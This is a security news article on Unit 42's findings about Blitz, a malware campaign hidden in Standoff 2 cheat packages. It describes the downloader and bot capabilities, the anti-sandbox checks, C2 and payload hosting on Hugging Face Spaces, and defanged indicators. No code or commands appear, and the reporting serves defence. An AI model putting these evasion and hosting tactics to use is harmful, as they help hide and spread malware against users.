Ddos 
Image: Unit 42
Unit 42, the threat intelligence arm of Palo Alto Networks, has uncovered a malware campaign involving Blitz, a stealthy and evolving Windows-based threat that targets unsuspecting gamers using backdoored cheat packages for the popular mobile game Standoff 2. What began as a ploy to lure cheat-seekers has morphed into a multi-stage malware operation that compromises systems, steals sensitive data, and hijacks resources to mine cryptocurrency — all while using legitimate infrastructure, including Hugging Face Spaces, for command and control.
The Blitz malware operation has been distributing malicious cheat packages with filenames like Nerest_CrackBy@sw1zzx_dev.zip and Elysium_CrackBy@sw1zzx_dev.zip, specifically crafted for users of the Android game Standoff 2, which had surpassed 100 million downloads by April 2025.
“These ZIP archives contain backdoored Windows executable (EXE) files… Running the Windows EXE file from the game cheat package retrieves the Blitz downloader behind the scenes,” Unit 42 states.
These trojanized cheats were shared via a Telegram channel (@sw1zzx_dev), operated by the malware author known as sw1zzx, who promoted them through Cyrillic-language posts and embedded videos.
Blitz operates in two distinct stages:
- Downloader (ieapfltr.dll) – Uses PowerShell one-liners to pull the second-stage payload from Hugging Face.
- Bot (Blitz bot) – Injected into RuntimeBroker.exe, the bot is capable of:
- Keylogging
- Screenshot capture
- File transfer (download/upload)
- DDoS attacks via HTTP flood
- Cryptojacking using XMRig miner
“Blitz bot performs information-stealing functions like keylogging and screenshot captures. Blitz bot also has a denial-of-service (DoS) function against web servers,” Unit 42 explains.
Notably, the malware features robust anti-sandboxing techniques, checking for VM artifacts, low screen resolutions, CPU counts, and known sandbox registry keys.
In an abuse of legitimate infrastructure, the Blitz malware uses Hugging Face Spaces — typically used to host machine learning apps — as a command-and-control (C2) channel. It also stores malicious payloads like the XMRig miner and bot DLL on the platform.
“Blitz malware abuses Hugging Face Spaces… The malware developer created a social media presence to promote the distribution of these backdoored game cheats,” Unit 42 notes.
One C2 endpoint (hxxps://e445a00fffe335d6dac0ac0fe0a5accc…hf[.]space) links directly to the external IP 176.65.137[.]44, potentially the malware’s admin panel.
By April 2025, researchers had identified 289 active infections of Blitz malware across 26 countries. Russia, Ukraine, Belarus, and Kazakhstan topped the list.
Following Unit 42’s disclosure in late April, the malware author posted a farewell message on Telegram in May 2025, claiming to have created a “cleaner.exe” tool to remove Blitz.
However, researchers suggest this could be a smokescreen:
“This goodbye statement is likely a cover story to disguise the author’s exit for other reasons.”
While cleaner.exe appears to remove some parts of Blitz, it fails to fully clean the registry due to a typo in the key name.
The Blitz campaign highlights the very real cybersecurity risks of downloading cracked software and game cheats from unofficial sources. The report concludes with a warning:
“Engaging with such software not only violates legal and ethical standards, but this activity also exposes your system to significant security risks, including malware like Blitz.”
Donate